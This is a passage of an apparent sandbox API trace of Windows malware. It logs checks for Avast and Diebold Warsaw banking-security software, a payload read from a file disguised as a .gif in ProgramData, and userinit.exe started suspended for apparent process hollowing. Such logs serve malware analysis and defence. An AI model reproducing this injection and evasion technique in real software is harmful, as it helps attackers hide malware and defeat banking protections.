[100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 1
[0147.375] ReadProcessMemory (in: hProcess=0x114, lpBaseAddress=0x7ffdf008, lpBuffer=0x580c74, nSize=0x4, lpNumberOfBytesRead=0x580c7c | out: lpBuffer=0x580c74*, lpNumberOfBytesRead=0x580c7c*=0x4) returned 1
[0147.376] VirtualAllocEx (hProcess=0x114, lpAddress=0x400000, dwSize=0x63000, flAllocationType=0x3000, flProtect=0x40) returned 0x0
[0147.376] VirtualFree (lpAddress=0x9d0000, dwSize=0x0, dwFreeType=0x8000) returned 1
[0147.376] TerminateProcess (hProcess=0x114, uExitCode=0x0) returned 1
[0147.376] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0147.376] GlobalUnlock (hMem=0x95000c) returned 0
[0147.376] GlobalHandle (pMem=0x33d8b0) returned 0x950004
[0147.376] GlobalUnlock (hMem=0x950004) returned 0
[0147.385] Sleep (dwMilliseconds=0xe74e)
[0157.397] FindWindowA (lpClassName=0x0, lpWindowName="marxvxinhhm0131") returned 0x0
[0157.397] FindFirstFileA (in: lpFileName="C:\\Program Files\\AVAST Software\\Avast\\aswRunDll.exe", lpFindFileData=0x12e580 | out: lpFindFileData=0x12e580) returned 0xffffffff
[0157.398] FindFirstFileA (in: lpFileName="C:\\Program Files\\Diebold\\Warsaw\\unins000.exe", lpFindFileData=0x12e580 | out: lpFindFileData=0x12e580) returned 0xffffffff
[0157.398] FindFirstFileA (in: lpFileName="C:\\Windows\\SysWOW64\\userinit.exe", lpFindFileData=0x12e580 | out: lpFindFileData=0x12e580) returned 0xffffffff
[0157.398] CreateFileA (lpFileName="C:\\ProgramData\\tempa\\marxvxinhhmgx.gif" (normalized: "c:\\programdata\\tempa\\marxvxinhhmgx.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120
[0157.398] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12e678*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12e678*=0) returned 0x0
[0157.398] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12e670*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12e670*=0) returned 0x0
[0157.398] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12e670*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12e670*=0) returned 0x5e000
[0157.398] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12e670*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12e670*=0) returned 0x0
[0157.400] GlobalLock (hMem=0x950004) returned 0x33d8b0
[0157.401] ReadFile (in: hFile=0x120, lpBuffer=0x33d8b0, nNumberOfBytesToRead=0x5e000, lpNumberOfBytesRead=0x12e68c, lpOverlapped=0x0 | out: lpBuffer=0x33d8b0*, lpNumberOfBytesRead=0x12e68c*=0x5e000, lpOverlapped=0x0) returned 1
[0157.408] CloseHandle (hObject=0x120) returned 1
[0157.408] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0157.409] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0157.409] GlobalUnlock (hMem=0x95000c) returned 0
[0157.409] GlobalReAlloc (hMem=0x95000c, dwBytes=0x4000, uFlags=0x2) returned 0x95000c
[0157.409] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0157.410] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0157.410] GlobalUnlock (hMem=0x95000c) returned 0
[0157.410] GlobalReAlloc (hMem=0x95000c, dwBytes=0x6000, uFlags=0x2) returned 0x95000c
[0157.411] GlobalLock (hMem=0x95000c) returned 0x39f8d0
[0157.412] GlobalHandle (pMem=0x39f8d0) returned 0x95000c
[0157.412] GlobalUnlock (hMem=0x95000c) returned 0
[0157.412] GlobalReAlloc (hMem=0x95000c, dwBytes=0x8000, uFlags=0x2) returned 0x95000c
[0157.412] GlobalLock (hMem=0x95000c) returned 0x3a58e0
[0157.414] GlobalHandle (pMem=0x3a58e0) returned 0x95000c
[0157.414] GlobalUnlock (hMem=0x95000c) returned 0
[0157.414] GlobalReAlloc (hMem=0x95000c, dwBytes=0xa000, uFlags=0x2) returned 0x95000c
[0157.414] GlobalLock (hMem=0x95000c) returned 0x3a58e0
[0157.415] GlobalHandle (pMem=0x3a58e0) returned 0x95000c
[0157.415] GlobalUnlock (hMem=0x95000c) returned 0
[0157.415] GlobalReAlloc (hMem=0x95000c, dwBytes=0xc000, uFlags=0x2) returned 0x95000c
[0157.416] GlobalLock (hMem=0x95000c) returned 0x3af8f0
[0157.417] GlobalHandle (pMem=0x3af8f0) returned 0x95000c
[0157.417] GlobalUnlock (hMem=0x95000c) returned 0
[0157.417] GlobalReAlloc (hMem=0x95000c, dwBytes=0xe000, uFlags=0x2) returned 0x95000c
[0157.418] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0157.419] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0157.419] GlobalUnlock (hMem=0x95000c) returned 0
[0157.419] GlobalReAlloc (hMem=0x95000c, dwBytes=0x10000, uFlags=0x2) returned 0x95000c
[0157.419] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0157.420] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0157.420] GlobalUnlock (hMem=0x95000c) returned 0
[0157.420] GlobalReAlloc (hMem=0x95000c, dwBytes=0x12000, uFlags=0x2) returned 0x95000c
[0157.420] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0157.421] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0157.421] GlobalUnlock (hMem=0x95000c) returned 0
[0157.421] GlobalReAlloc (hMem=0x95000c, dwBytes=0x14000, uFlags=0x2) returned 0x95000c
[0157.421] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0157.422] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0157.422] GlobalUnlock (hMem=0x95000c) returned 0
[0157.422] GlobalReAlloc (hMem=0x95000c, dwBytes=0x16000, uFlags=0x2) returned 0x95000c
[0157.422] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0157.423] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0157.423] GlobalUnlock (hMem=0x95000c) returned 0
[0157.423] GlobalReAlloc (hMem=0x95000c, dwBytes=0x18000, uFlags=0x2) returned 0x95000c
[0157.423] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0157.424] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0157.424] GlobalUnlock (hMem=0x95000c) returned 0
[0157.424] GlobalReAlloc (hMem=0x95000c, dwBytes=0x1a000, uFlags=0x2) returned 0x95000c
[0157.424] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0157.425] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0157.425] GlobalUnlock (hMem=0x95000c) returned 0
[0157.425] GlobalReAlloc (hMem=0x95000c, dwBytes=0x1c000, uFlags=0x2) returned 0x95000c
[0157.425] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0157.426] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0157.426] GlobalUnlock (hMem=0x95000c) returned 0
[0157.426] GlobalReAlloc (hMem=0x95000c, dwBytes=0x1e000, uFlags=0x2) returned 0x95000c
[0157.426] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0157.427] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0157.427] GlobalUnlock (hMem=0x95000c) returned 0
[0157.427] GlobalReAlloc (hMem=0x95000c, dwBytes=0x20000, uFlags=0x2) returned 0x95000c
[0157.427] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0157.428] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0157.428] GlobalUnlock (hMem=0x95000c) returned 0
[0157.428] GlobalReAlloc (hMem=0x95000c, dwBytes=0x22000, uFlags=0x2) returned 0x95000c
[0157.430] GlobalLock (hMem=0x95000c) returned 0x3bb8d0
[0157.431] GlobalHandle (pMem=0x3bb8d0) returned 0x95000c
[0157.431] GlobalUnlock (hMem=0x95000c) returned 0
[0157.431] GlobalReAlloc (hMem=0x95000c, dwBytes=0x24000, uFlags=0x2) returned 0x95000c
[0157.431] GlobalLock (hMem=0x95000c) returned 0x3bb8d0
[0157.432] GlobalHandle (pMem=0x3bb8d0) returned 0x95000c
[0157.432] GlobalUnlock (hMem=0x95000c) returned 0
[0157.432] GlobalReAlloc (hMem=0x95000c, dwBytes=0x26000, uFlags=0x2) returned 0x95000c
[0157.434] GlobalLock (hMem=0x95000c) returned 0x3df8e0
[0157.435] GlobalHandle (pMem=0x3df8e0) returned 0x95000c
[0157.435] GlobalUnlock (hMem=0x95000c) returned 0
[0157.435] GlobalReAlloc (hMem=0x95000c, dwBytes=0x28000, uFlags=0x2) returned 0x95000c
[0157.435] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0157.436] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0157.436] GlobalUnlock (hMem=0x95000c) returned 0
[0157.436] GlobalReAlloc (hMem=0x95000c, dwBytes=0x2a000, uFlags=0x2) returned 0x95000c
[0157.436] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0157.437] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0157.437] GlobalUnlock (hMem=0x95000c) returned 0
[0157.437] GlobalReAlloc (hMem=0x95000c, dwBytes=0x2c000, uFlags=0x2) returned 0x95000c
[0157.437] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0157.438] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0157.438] GlobalUnlock (hMem=0x95000c) returned 0
[0157.438] GlobalReAlloc (hMem=0x95000c, dwBytes=0x2e000, uFlags=0x2) returned 0x95000c
[0157.438] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0157.439] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0157.439] GlobalUnlock (hMem=0x95000c) returned 0
[0157.439] GlobalReAlloc (hMem=0x95000c, dwBytes=0x30000, uFlags=0x2) returned 0x95000c
[0157.439] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0157.440] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0157.440] GlobalUnlock (hMem=0x95000c) returned 0
[0157.440] GlobalReAlloc (hMem=0x95000c, dwBytes=0x32000, uFlags=0x2) returned 0x95000c
[0157.440] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0157.441] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0157.441] GlobalUnlock (hMem=0x95000c) returned 0
[0157.441] GlobalReAlloc (hMem=0x95000c, dwBytes=0x34000, uFlags=0x2) returned 0x95000c
[0157.441] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0157.441] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0157.441] GlobalUnlock (hMem=0x95000c) returned 0
[0157.441] GlobalReAlloc (hMem=0x95000c, dwBytes=0x36000, uFlags=0x2) returned 0x95000c
[0157.441] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0157.442] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0157.442] GlobalUnlock (hMem=0x95000c) returned 0
[0157.442] GlobalReAlloc (hMem=0x95000c, dwBytes=0x38000, uFlags=0x2) returned 0x95000c
[0157.442] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0157.443] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0157.443] GlobalUnlock (hMem=0x95000c) returned 0
[0157.443] GlobalReAlloc (hMem=0x95000c, dwBytes=0x3a000, uFlags=0x2) returned 0x95000c
[0157.443] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0157.444] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0157.444] GlobalUnlock (hMem=0x95000c) returned 0
[0157.445] GlobalReAlloc (hMem=0x95000c, dwBytes=0x3c000, uFlags=0x2) returned 0x95000c
[0157.445] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0157.445] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0157.445] GlobalUnlock (hMem=0x95000c) returned 0
[0157.445] GlobalReAlloc (hMem=0x95000c, dwBytes=0x3e000, uFlags=0x2) returned 0x95000c
[0157.445] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0157.446] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0157.446] GlobalUnlock (hMem=0x95000c) returned 0
[0157.446] GlobalReAlloc (hMem=0x95000c, dwBytes=0x40000, uFlags=0x2) returned 0x95000c
[0157.446] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0157.447] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0157.447] GlobalUnlock (hMem=0x95000c) returned 0
[0157.447] GlobalReAlloc (hMem=0x95000c, dwBytes=0x42000, uFlags=0x2) returned 0x95000c
[0157.447] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0157.448] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0157.448] GlobalUnlock (hMem=0x95000c) returned 0
[0157.448] GlobalReAlloc (hMem=0x95000c, dwBytes=0x44000, uFlags=0x2) returned 0x95000c
[0157.448] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0157.449] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0157.449] GlobalUnlock (hMem=0x95000c) returned 0
[0157.449] GlobalReAlloc (hMem=0x95000c, dwBytes=0x46000, uFlags=0x2) returned 0x95000c
[0157.449] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0157.450] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0157.450] GlobalUnlock (hMem=0x95000c) returned 0
[0157.450] GlobalReAlloc (hMem=0x95000c, dwBytes=0x48000, uFlags=0x2) returned 0x95000c
[0157.450] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0157.451] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0157.451] GlobalUnlock (hMem=0x95000c) returned 0
[0157.451] GlobalReAlloc (hMem=0x95000c, dwBytes=0x4a000, uFlags=0x2) returned 0x95000c
[0157.451] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0157.452] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0157.452] GlobalUnlock (hMem=0x95000c) returned 0
[0157.452] GlobalReAlloc (hMem=0x95000c, dwBytes=0x4c000, uFlags=0x2) returned 0x95000c
[0157.452] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0157.453] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0157.453] GlobalUnlock (hMem=0x95000c) returned 0
[0157.453] GlobalReAlloc (hMem=0x95000c, dwBytes=0x4e000, uFlags=0x2) returned 0x95000c
[0157.453] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0157.454] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0157.454] GlobalUnlock (hMem=0x95000c) returned 0
[0157.454] GlobalReAlloc (hMem=0x95000c, dwBytes=0x50000, uFlags=0x2) returned 0x95000c
[0157.454] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0157.455] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0157.455] GlobalUnlock (hMem=0x95000c) returned 0
[0157.455] GlobalReAlloc (hMem=0x95000c, dwBytes=0x52000, uFlags=0x2) returned 0x95000c
[0157.455] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0157.456] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0157.456] GlobalUnlock (hMem=0x95000c) returned 0
[0157.456] GlobalReAlloc (hMem=0x95000c, dwBytes=0x54000, uFlags=0x2) returned 0x95000c
[0157.456] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0157.457] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0157.457] GlobalUnlock (hMem=0x95000c) returned 0
[0157.457] GlobalReAlloc (hMem=0x95000c, dwBytes=0x56000, uFlags=0x2) returned 0x95000c
[0157.457] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0157.458] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0157.458] GlobalUnlock (hMem=0x95000c) returned 0
[0157.458] GlobalReAlloc (hMem=0x95000c, dwBytes=0x58000, uFlags=0x2) returned 0x95000c
[0157.458] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0157.458] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0157.459] GlobalUnlock (hMem=0x95000c) returned 0
[0157.459] GlobalReAlloc (hMem=0x95000c, dwBytes=0x5a000, uFlags=0x2) returned 0x95000c
[0157.459] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0157.459] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0157.459] GlobalUnlock (hMem=0x95000c) returned 0
[0157.459] GlobalReAlloc (hMem=0x95000c, dwBytes=0x5c000, uFlags=0x2) returned 0x95000c
[0157.460] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0157.460] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0157.460] GlobalUnlock (hMem=0x95000c) returned 0
[0157.460] GlobalReAlloc (hMem=0x95000c, dwBytes=0x5e000, uFlags=0x2) returned 0x95000c
[0157.460] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0157.461] CreateProcessA (in: lpApplicationName="C:\\Windows\\System32\\userinit.exe", lpCommandLine="", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x4, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x580c20*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x580c10 | out: lpCommandLine="", lpProcessInformation=0x580c10*(hProcess=0x11c, hThread=0x120, dwProcessId=0x174, dwThreadId=0x6e4)) returned 1
[0157.465] VirtualAlloc (lpAddress=0x0, dwSize=0xd0, flAllocationType=0x1000, flProtect=0x4) returned 0x9d0000
[0157.465] GetThreadContext (in: hThread=0x120, lpContext=0x9d0000 | out: lpContext=0x9d0000*(ContextFlags=0x10007, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x0, SegFs=0x3b, SegEs=0x23, SegDs=0x23, Edi=0x0, Esi=0x0, Ebx=0x7ffd6000, Edx=0x0, Ecx=0x0, Eax=0xd82be9, Ebp=0x0, Eip=0x76f67098, SegCs=0x1b, EFlags=0x200, Esp=0x24f9e8, SegSs=0x23, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, 